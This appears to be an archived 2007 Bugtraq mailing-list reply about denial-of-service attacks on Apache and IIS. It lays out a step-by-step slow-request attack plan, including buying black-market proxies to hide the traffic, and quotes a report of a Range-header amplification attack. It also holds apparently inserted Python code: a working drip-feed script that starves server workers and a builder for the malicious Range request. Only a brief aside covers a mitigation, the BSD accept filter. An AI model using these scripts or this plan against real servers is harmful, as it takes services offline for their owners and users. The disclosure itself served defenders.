Message-ID: <20070105084527.GA7692@fenrir.highloads.net>
Date: Fri, 5 Jan 2007 08:45:27 +0000
From: bugtraq <bugtraq@...urityfocus.lists.bitrouters.com>
To: bugtraq@...urityfocus.com
Subject: Re: a cheesy Apache / IIS DoS vuln (+a question)
To kill the server it is enough to never finish the request and let it time out on the server side.
No DoS/DDoS protection layer can stand against this attack (as far as I know), and the scenario is simple:
1. Fingerprint the timeout on the server side.
2. Dig the sitemap from the target.
3. Build a list of browser identities to advertise to the server during requests.
4. Buy proxies on the black market.
5. Start requests through the proxies against the target.
The requests are never finished: randomized headers, following the sitemap. Send a few bytes, wait something less than the server timeout, then send the next few bytes, and never complete the request. Apache, at least, will wait for the request to finish. With 2k proxies each starting 3-4 requests (browsers send parallel requests, and the target should allow more than one per client), you can generate a continuous flow of 6k to 8k requests to Apache. Starvation sets in quickly: Apache just consumes its resources waiting for bogus requests to finish; it never reads a full request, it only times out waiting for data. Better yet, you can stretch the wait out, because (at least in some implementations; I think I tested 1.3.x and 2.0.x) when you send the first few bytes and put Apache on hold, it starts its timer, but when you send the next few bytes after X seconds it resets the timer for that request. A slow, sure-thing death.
With a default timeout of 300 seconds on the server side and request headers of, say, 512 bytes, sending at most rand(5,10) bytes just before each timeout hits will keep a worker busy for at least 300*50 seconds with one single request. Discard the connection once the request headers are sent and just start a new one; you don't have to consume bandwidth reading the response.
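A minimal sketch of the drip-feed technique described above (the target, paths, and timing values are all illustrative placeholders; this assumes, as the text does, that the server resets its read timer on every partial write):

```python
import random
import socket
import time

# Illustrative placeholders -- a real run would use a crawled sitemap
# and a fingerprinted timeout, as in the steps above.
TARGET = ("target.example", 80)
PATHS = ["/", "/index.html"]
SERVER_TIMEOUT = 300  # fingerprinted server-side timeout, in seconds

# A browser-like request that deliberately omits the final blank line,
# so the server never sees a complete request.
REQUEST = (
    "GET {path} HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "User-Agent: Mozilla/5.0 (randomized per request)\r\n"
    "Accept: text/html\r\n"
).format(path=random.choice(PATHS)).encode()

def drip_feed(sock, data, timeout):
    """Send `data` rand(5,10) bytes at a time, sleeping just under the
    server's timeout between writes so its read timer keeps resetting."""
    sent = 0
    while sent < len(data):
        chunk = data[sent:sent + random.randint(5, 10)]
        sock.sendall(chunk)
        sent += len(chunk)
        # Stay just inside the timeout window before the next dribble.
        time.sleep(max(0, timeout - 5))
    # The terminating "\r\n" is never sent: the request stays
    # incomplete and the worker keeps waiting for it.

# Usage (per proxied connection): drip_feed(sock, REQUEST, SERVER_TIMEOUT)
```

Each connection would be opened through a different proxy and dropped once the header bytes run out, then restarted, keeping the pool of stalled workers full.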
A quick fix for this is available at least on BSD: there is accf_http, which can be modified not to pass the connection to Apache until a full request has been read (either GET or POST, the whole request, not just the first request header; of course, this can be even worse with a lot of POST data). There are probably DDoS middle layers that can do this, but I have not found one yet. At least the big players on the market seem to be vulnerable.
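For reference, the stock FreeBSD accept filter already holds a connection in the kernel until a complete request header has arrived, which blunts the header-dripping variant even without the modification suggested above (directive names per the FreeBSD and Apache documentation; exact setup may differ by version):

```shell
# Load the HTTP accept filter into the kernel (FreeBSD)
kldload accf_http

# Apache (2.2+) can then use it via httpd.conf:
#   AcceptFilter http httpready
# With this, accept() only returns to Apache once a full HTTP
# request header has been buffered in the kernel.
```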
You can't find patterns to stop this kind of attack, because you simulate a real browser 100%; all you can do is read ahead the request and filter out the bogus ones before Apache sees them. 99% of Apache setups run with the default config, never modified by the owner (thinking of cPanel, at least). It's not about consuming server bandwidth; it's about making the server choke, and that happens very fast.
On Thu, Jan 04, 2007 at 12:27:11AM +0100, Michal Zalewski wrote:
> I feel silly for reporting this, but I couldn't help but notice that
> Apache and IIS both have a bizarro implementation of HTTP/1.1 "Range"
> header functionality (as defined by RFC 2616). Their implementations allow
> the same fragment of a file to be requested an arbitrary number of times,
> and each redundant part to be received separately in a separate
> multipart/byteranges envelope.
>
> Combined with the functionality of window scaling (as per RFC 1323), it is
> my impression that a lone, short request can be used to trick the server
> into firing gigabytes of bogus data into the void, regardless of the
> server file size, connection count, or keep-alive request number limits
> implemented by the administrator. Whoops?
>
> Since there are easier tools to (D)DoS a service, and since nothing about
> this attack is particularly innovative, I'll just describe what's on my
> mind... let's say that http://example.com/foo.html is a medium-size static
> file we found on the server (something on the order of 300 kB for Apache
> and 150 kB for IIS is optimal). An attack would then look roughly the
> following way:
>
> 1) Connect to the server (as many times as allowed by the remote party
> or deemed appropriate for the purpose of this demonstration),
>
> 2) Negotiate a high TCP window size for each of the connections (1 GB
> should be doable),
>
> 3) Send a partial request as follows for each of the connections:
> GET /foo.html HTTP/1.1
> Host: example.com
> Range: bytes=0-,0-,0-,0-,0-... (up to 8 kB for Apache, 16 kB for IIS)
>
> Each "0-" would generate a separate multipart/byteranges containing
> the entire file (bytes from 0 'til EOF).
>
> 4) Send a closing newline within each of the connections to commit
> the request,
>
> 5) Silently drop the connections, possibly re-connect to dial-up / DSL
> to duck the responses that would keep pouring at full speed until
> TCP window size is exhausted or an ISP-level non-delivery /
> congestion control mechanism kicks in (and isn't filtered out
> down the route).
>
> This should cause the server to send gigabytes of data, with only a
> minimal bandwidth expense on the attacker's end.
>
> Well, that's the story.
>
> This isn't the only "fire-and-run-away" attack that seems to be made much
> more feasible with the help of window scaling (by making it more tempting
> for the attacker to request tons of data and then go off-line and never
> acknowledge it). Was there any work done on that topic? Can't Google
> anything up.
>
> (An example would be an "old-fashioned" attack on a server that happens
> to host multi-gigabyte ISO files or movies - simply request them
> many times and let window scaling do the rest... of course, most
> high-profile sites are smart enough to host static HTML and basic layout
> elements separately from such bandwidth-intensive and non-essential
> content, so it still makes sense to take note of "Range" behavior).
>
> /mz
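For reference, the single request described in the quoted steps would look roughly like this (my own reconstruction, not from the original mail; "example.com" and the 8 kB header cap are taken from the text, everything else is a placeholder):

```python
def build_range_request(path="/foo.html", host="example.com", max_header=8192):
    """Build a Range header packed with redundant "0-" ranges, staying
    under the server's header-size limit (8 kB for Apache per the text).
    Each "0-" asks for the whole file again, from byte 0 to EOF, in its
    own multipart/byteranges part."""
    base = "Range: bytes="
    count = (max_header - len(base)) // len("0-,")
    ranges = ",".join(["0-"] * count)
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"{base}{ranges}\r\n"
        "\r\n"  # the "closing newline" that commits the request (step 4)
    )
```

Sent over a connection with a large negotiated TCP window and then silently dropped (step 5), each such request would have the server stream thousands of copies of the file into the void.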
--
adrian ilarion ciobanu (cia)